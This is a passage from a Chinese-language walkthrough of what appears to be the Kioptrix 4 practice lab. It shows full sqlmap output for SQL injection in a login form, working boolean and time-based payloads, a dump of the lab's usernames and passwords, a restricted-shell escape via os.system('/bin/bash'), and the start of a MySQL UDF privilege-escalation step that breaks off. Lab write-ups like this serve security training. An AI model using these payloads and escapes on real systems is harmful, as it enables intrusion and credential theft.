    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close

    3.1.2 爆破数据库

    └─# sqlmap -r sql.txt --batch --level 3 --dbs
     ___ ___[']_____ ___ ___  {1.8.3#stable}
    |_ -| . [)]     | .'| . |
    |___|_  [.]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:35:59 /2024-06-12/
    [09:35:59] [INFO] parsing HTTP request from 'sql.txt'
    [09:36:00] [INFO] testing connection to the target URL
    [09:36:00] [INFO] testing if the target URL content is stable
    [09:36:00] [INFO] target URL content is stable
    [09:36:00] [INFO] testing if POST parameter 'myusername' is dynamic
    [09:36:00] [WARNING] POST parameter 'myusername' does not appear to be dynamic
    [09:36:00] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
    [09:36:00] [INFO] testing for SQL injection on POST parameter 'myusername'
    [09:36:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [09:36:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
    [09:36:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [09:36:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [09:36:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
    [09:36:01] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
    [09:36:02] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
    [09:36:02] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
    [09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [09:36:02] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
    [09:36:02] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
    [09:36:02] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
    [09:36:02] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
    [09:36:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
    [09:36:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [09:36:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [09:36:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
    [09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
    [09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
    [09:36:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
    [09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
    [09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
    [09:36:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
    [09:36:04] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
    [09:36:04] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'
    [09:36:05] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'
    [09:36:05] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'
    [09:36:05] [INFO] testing 'ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [09:36:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [09:36:05] [INFO] testing 'PostgreSQL error-based - Parameter replace'
    [09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
    [09:36:05] [INFO] testing 'Oracle error-based - Parameter replace'
    [09:36:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [09:36:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [09:36:05] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
    [09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
    [09:36:05] [INFO] testing 'Generic inline queries'
    [09:36:05] [INFO] testing 'MySQL inline queries'
    [09:36:05] [INFO] testing 'PostgreSQL inline queries'
    [09:36:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
    [09:36:05] [INFO] testing 'Oracle inline queries'
    [09:36:05] [INFO] testing 'SQLite inline queries'
    [09:36:06] [INFO] testing 'Firebird inline queries'
    [09:36:06] [INFO] testing 'ClickHouse inline queries'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
    [09:36:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
    [09:36:06] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
    [09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [09:36:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
    [09:36:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
    [09:36:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
    [09:36:07] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
    [09:36:07] [INFO] testing 'MySQL AND time-based blind (ELT)'
    [09:36:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
    [09:36:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
    [09:36:08] [INFO] testing 'Oracle AND time-based blind'
    [09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
    [09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
    [09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
    [09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'
    [09:36:08] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'
    [09:36:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
    [09:36:08] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
    [09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'
    [09:36:08] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'
    it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
    [09:36:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    [09:36:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
    [09:36:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
    [09:36:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
    [09:36:10] [WARNING] POST parameter 'myusername' does not seem to be injectable
    [09:36:10] [INFO] testing if POST parameter 'mypassword' is dynamic
    [09:36:10] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
    [09:36:10] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
    [09:36:10] [INFO] testing for SQL injection on POST parameter 'mypassword'
    it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
    [09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [09:36:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
    [09:36:10] [INFO] POST parameter 'mypassword' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --not-string="28")
    [09:36:10] [INFO] testing 'Generic inline queries'
    [09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    got a 302 redirect to ''. Do you want to follow? [Y/n] Y
    redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
    [09:36:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [09:36:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [09:36:10] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
    [09:36:10] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
    [09:36:10] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [09:36:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [09:36:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:10] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [09:36:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [09:36:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [09:36:11] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [09:36:11] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
    [09:36:11] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [09:36:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [09:36:11] [INFO] testing 'MySQL inline queries'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
    [09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
    [09:36:11] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
    [09:36:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [09:36:21] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
    [09:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [09:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [09:36:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [09:36:21] [INFO] target URL appears to have 3 columns in query
    do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [09:36:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
    [09:36:22] [INFO] target URL appears to be UNION injectable with 3 columns
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [09:36:23] [INFO] testing 'Generic UNION query (59) - 21 to 40 columns'
    [09:36:23] [INFO] testing 'Generic UNION query (59) - 41 to 60 columns'
    [09:36:23] [INFO] testing 'MySQL UNION query (59) - 1 to 20 columns'
    [09:36:24] [INFO] testing 'MySQL UNION query (59) - 21 to 40 columns'
    [09:36:24] [INFO] testing 'MySQL UNION query (59) - 41 to 60 columns'
    [09:36:24] [INFO] testing 'MySQL UNION query (59) - 61 to 80 columns'
    [09:36:25] [INFO] testing 'MySQL UNION query (59) - 81 to 100 columns'
    [09:36:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
    POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 1473 HTTP(s) requests:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:36:25] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP, Apache 2.2.8, PHP 5.2.4
    back-end DBMS: MySQL >= 5.0.12
    [09:36:25] [INFO] fetching database names
    [09:36:25] [INFO] fetching number of databases
    [09:36:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:36:25] [INFO] retrieved: 3
    [09:36:25] [INFO] retrieved: information_schema
    [09:36:26] [INFO] retrieved: members
    [09:36:26] [INFO] retrieved: mysql
    available databases [3]:
    [*] information_schema
    [*] members
    [*] mysql
    [09:36:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:36:27 /2024-06-12/


    • information_schema
    • members
    • mysql

    3.1.3 当前连接的数据库

    └─# sqlmap -r sql.txt --batch --level 3 --current-db 
     ___ ___[.]_____ ___ ___  {1.8.3#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [']_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:42:14 /2024-06-12/
    [09:42:14] [INFO] parsing HTTP request from 'sql.txt'
    [09:42:15] [INFO] resuming back-end DBMS 'mysql' 
    [09:42:15] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:42:15] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8
    back-end DBMS: MySQL >= 5.0.12
    [09:42:15] [INFO] fetching current database
    [09:42:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:42:15] [INFO] retrieved: members
    current database: 'members'
    [09:42:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:42:15 /2024-06-12/


    • members

    3.1.4 连接的数据库的表名

    └─# sqlmap -r sql.txt --batch --level 3 -D members --tables
     ___ ___[']_____ ___ ___  {1.8.3#stable}
    |_ -| . ["]     | .'| . |
    |___|_  ["]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:45:10 /2024-06-12/
    [09:45:10] [INFO] parsing HTTP request from 'sql.txt'
    [09:45:10] [INFO] resuming back-end DBMS 'mysql' 
    [09:45:10] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:45:11] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: Apache 2.2.8, PHP 5.2.4
    back-end DBMS: MySQL >= 5.0.12
    [09:45:11] [INFO] fetching tables for database: 'members'
    [09:45:11] [INFO] fetching number of tables for database 'members'
    [09:45:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:45:11] [INFO] retrieved: 1
    [09:45:11] [INFO] retrieved: members
    Database: members
    [1 table]
    | members |
    [09:45:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:45:11 /2024-06-12/


    3.1.5 字段名

    └─# sqlmap -r sql.txt --batch --level 3 -D members -T members --columns
     ___ ___[.]_____ ___ ___  {1.8.3#stable}
    |_ -| . [(]     | .'| . |
    |___|_  ["]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:48:22 /2024-06-12/
    [09:48:22] [INFO] parsing HTTP request from 'sql.txt'
    [09:48:22] [INFO] resuming back-end DBMS 'mysql' 
    [09:48:22] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:48:22] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8
    back-end DBMS: MySQL >= 5.0.12
    [09:48:22] [INFO] fetching columns for table 'members' in database 'members'
    [09:48:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:48:22] [INFO] retrieved: 3
    [09:48:22] [INFO] retrieved: id
    [09:48:23] [INFO] retrieved: int(4)
    [09:48:23] [INFO] retrieved: username
    [09:48:23] [INFO] retrieved: varchar(65)
    [09:48:24] [INFO] retrieved: password
    [09:48:24] [INFO] retrieved: varchar(65)
    Database: members
    Table: members
    [3 columns]
    | Column   | Type        |
    | id       | int(4)      |
    | password | varchar(65) |
    | username | varchar(65) |
    [09:48:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/'
    [*] ending @ 09:48:25 /2024-06-12/


    • id
    • password
    • username

    3.1.6 用户名和密码

    └─# sqlmap -r sql.txt --batch --level 3 -D members -T members -C id,username,password --dump
     ___ ___[(]_____ ___ ___  {1.8.3#stable}
    |_ -| . [)]     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting @ 09:52:26 /2024-06-12/
    [09:52:26] [INFO] parsing HTTP request from 'sql.txt'
    [09:52:26] [INFO] resuming back-end DBMS 'mysql' 
    [09:52:26] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    Parameter: mypassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: myusername=admin&mypassword=123456' AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 3625 UNION SELECT 8434) END))-- -&Submit=Login
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: myusername=admin&mypassword=123456' AND (SELECT 1417 FROM (SELECT(SLEEP(5)))ImmZ)-- MSgA&Submit=Login
    [09:52:26] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: Apache 2.2.8, PHP 5.2.4
    back-end DBMS: MySQL >= 5.0.12
    [09:52:26] [INFO] fetching entries of column(s) 'id,password,username' for table 'members' in database 'members'
    [09:52:26] [INFO] fetching number of column(s) 'id,password,username' entries for table 'members' in database 'members'
    [09:52:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:52:26] [INFO] retrieved: 2
    [09:52:26] [INFO] retrieved: 1
    [09:52:26] [INFO] retrieved: MyNameIsJohn
    [09:52:27] [INFO] retrieved: john
    [09:52:27] [INFO] retrieved: 2
    [09:52:27] [INFO] retrieved: ADGAds
    [09:52:28] [INFO] retrieved: 
    [09:52:28] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                        
    do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
    [09:52:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
    [09:52:43] [INFO] adjusting time delay to 1 second due to good response times
    Database: members
    Table: members
    [2 entries]
    | id | username | password     |
    | 1  | john     | MyNameIsJohn |
    | 2  | robert   | ADGAds       |



    3.2 shell逃逸

    3.2.1 ssh登录

    Xshell 7 (Build 0063)
    Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
    Type `help' to learn how to use Xshell prompt.
    [C:\~]$ ssh john@
    Connecting to
    Connection established.
    To escape to local shell, press 'Ctrl+Alt+]'.
    WARNING! The remote SSH server rejected X11 forwarding request.
    Welcome to LigGoat Security Systems - We are Watching
    == Welcome LigGoat Employee ==
    LigGoat Shell is in place so you  don't screw up
    Type '?' or 'help' to get the list of allowed commands


    3.2.2 shell逃逸

    Xshell 7 (Build 0063)
    Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
    Type `help' to learn how to use Xshell prompt.
    [C:\~]$ ssh john@
    Connecting to
    Connection established.
    To escape to local shell, press 'Ctrl+Alt+]'.
    WARNING! The remote SSH server rejected X11 forwarding request.
    Welcome to LigGoat Security Systems - We are Watching
    == Welcome LigGoat Employee ==
    LigGoat Shell is in place so you  don't screw up
    Type '?' or 'help' to get the list of allowed commands
    john:~$ echo os.system('/bin/bash')


    3.3 mysql udf提权

    3.3.1 查看服务

    john@Kioptrix4:~$ ps -ef
    UID        PID  PPID  C STIME TTY          TIME CMD
    root         1     0  0 16:22 ?        00:00:03 /sbin/init
    root         2     0  0 16:22 ?        00:00:00 [kthreadd]
    root         3     2  0 16:22 ?        00:00:00 [migration/0]
    root         4     2  0 16:22 ?        00:00:00 [ksoftirqd/0]
    root         5     2  0 16:22 ?        00:00:00 [watchdog/0]
    root         6     2  0 16:22 ?        00:00:00 [migration/1]
    root         7     2  0 16:22 ?        00:00:00 [ksoftirqd/1]
    root         8     2  0 16:22 ?        00:00:00 [watchdog/1]
    root         9     2  0 16:22 ?        00:00:00 [events/0]
    root        10     2  0 16:22 ?        00:00:00 [events/1]
    root        11     2  0 16:22 ?        00:00:00 [khelper]
    root        46     2  0 16:22 ?        00:00:00 [kblockd/0]
    root        47     2  0 16:22 ?        00:00:00 [kblockd/1]
    root        50     2  0 16:22 ?        00:00:00 [kacpid]
    root        51     2  0 16:22 ?        00:00:00 [kacpi_notify]
    root       247     2  0 16:22 ?        00:00:00 [kseriod]
    root       291     2  0 16:22 ?        00:00:00 [pdflush]
    root       292     2  0 16:22 ?        00:00:00 [pdflush]
    root       293     2  0 16:22 ?        00:00:00 [kswapd0]
    root       335     2  0 16:22 ?        00:00:00 [aio/0]
    root       336     2  0 16:22 ?        00:00:00 [aio/1]
    root      1742     2  0 16:22 ?        00:00:00 [ksuspend_usbd]
    root      1746     2  0 16:22 ?        00:00:00 [khubd]
    root      2180     2  0 16:22 ?        00:00:00 [ata/0]
    root      2181     2  0 16:22 ?        00:00:00 [ata/1]
    root      2185     2  0 16:22 ?        00:00:00 [ata_aux]
    root      2629     2  0 16:22 ?        00:00:00 [scsi_eh_0]
    root      2657     2  0 16:22 ?        00:00:00 [scsi_eh_1]
    root      2658     2  0 16:22 ?        00:00:00 [scsi_eh_2]
    root      2659     2  0 16:22 ?        00:00:00 [scsi_eh_3]
    root      2660     2  0 16:22 ?        00:00:00 [scsi_eh_4]
    root      2661     2  0 16:22 ?        00:00:00 [scsi_eh_5]
    root      2662     2  0 16:22 ?        00:00:00 [scsi_eh_6]
    root      2663     2  0 16:22 ?        00:00:00 [scsi_eh_7]
